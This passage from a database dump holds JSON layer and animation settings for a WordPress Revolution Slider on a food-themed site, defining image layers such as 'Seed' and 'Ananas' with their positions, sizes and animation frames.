\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":290},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":980,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":980,\"start\":290,\"startRelative\":290},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1750,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"15\":{\"text\":\"Image 12\",\"alias\":\"Seed\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic8.png\",\"imageId\":2612},\"size\":{\"width\":{\"d\":{\"v\":\"44px\",\"e\":true},\"n\":{\"v\":\"44px\",\"e\":true},\"t\":{\"v\":\"44px\"},\"m\":{\"v\":\"27px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"54px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"54px\"},\"m\":{\"v\":\"33px\",\"e\":true}},\"originalWidth\":47,\"originalHeight\":58,\"aspectRatio\":{\"d\":{\"v\":0.8103448275862069},\"n\":{\"v\":0.8103448275862069},\"t\":{\"v\":0.8103448275862069},\"m\":{\"v\":0.8103448275862069}}},\"position\":{\"x\":{\"d\":{\"v\":\"720px\",\"e\":true},\"n\":{\"v\":\"557px\",\"e\":true},\"t\":{\"v\":\"213px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"211px\",\"e\":true},\"t\":{\"v\":\"157px\",\"e\":true},\"m\":{\"v\":\"102px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"{-90,180}\",\"rotationY\":\"180deg\",\"rotationZ\":\"[-50|180]\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1290,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1290,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"16\":{\"text\":\"Image 13\",\"alias\":\"Seed1\",\"uid\":16,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic9.png\",\"imageId\":2613},\"size\":{\"width\":{\"d\":{\"v\":\"56px\",\"e\":true},\"n\":{\"v\":\"59px\",\"e\":true},\"t\":{\"v\":\"59px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"66px\",\"e\":true},\"t\":{\"v\":\"66px\",\"e\":true},\"m\":{\"v\":\"43px\",\"e\":true}},\"originalWidth\":76,\"originalHeight\":66,\"aspectRatio\":{\"d\":{\"v\":1.1515151515151516},\"n\":{\"v\":1.1515151515151516},\"t\":{\"v\":1.1515151515151516},\"m\":{\"v\":1.1515151515151516}}},\"position\":{\"x\":{\"d\":{\"v\":\"682px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"176px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"126px\",\"e\":true},\"n\":{\"v\":\"101px\",\"e\":true},\"t\":{\"v\":\"67px\",\"e\":true},\"m\":{\"v\":\"18px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":80},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,360}\",\"rotationY\":\"{-90,60}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1460,\"start\":80,\"startRelative\":80},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":2,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1460,\"start\":80,\"startRelative\":80},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1480,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"17\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":17,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/h1-slide1.png\",\"imageId\":4225},\"size\":{\"width\":{\"d\":{\"v\":\"399px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"286px\",\"e\":true},\"m\":{\"v\":\"142px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"399px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"286px\",\"e\":true},\"m\":{\"v\":\"142px\",\"e\":true}},\"originalWidth\":399,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-676px\",\"e\":true},\"n\":{\"v\":\"-426px\",\"e\":true},\"t\":{\"v\":\"-204px\",\"e\":true},\"m\":{\"v\":\"-114px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"473px\",\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"v\":\"388px\",\"e\":true},\"m\":{\"v\":\"248px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3020,\"startRelative\":2720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(6,3,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/back-pear.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic1.png\",\"imageId\":1074},\"size\":{\"width\":{\"d\":{\"v\":\"518px\",\"e\":true},\"n\":{\"v\":\"359px\",\"e\":true},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"523px\",\"e\":true},\"n\":{\"v\":\"362px\",\"e\":true},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":518,\"originalHeight\":523,\"aspectRatio\":{\"d\":{\"v\":0.9904397705544933},\"n\":{\"v\":0.9904397705544933},\"t\":{\"v\":0.9904397705544933},\"m\":{\"v\":0.9904397705544933}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 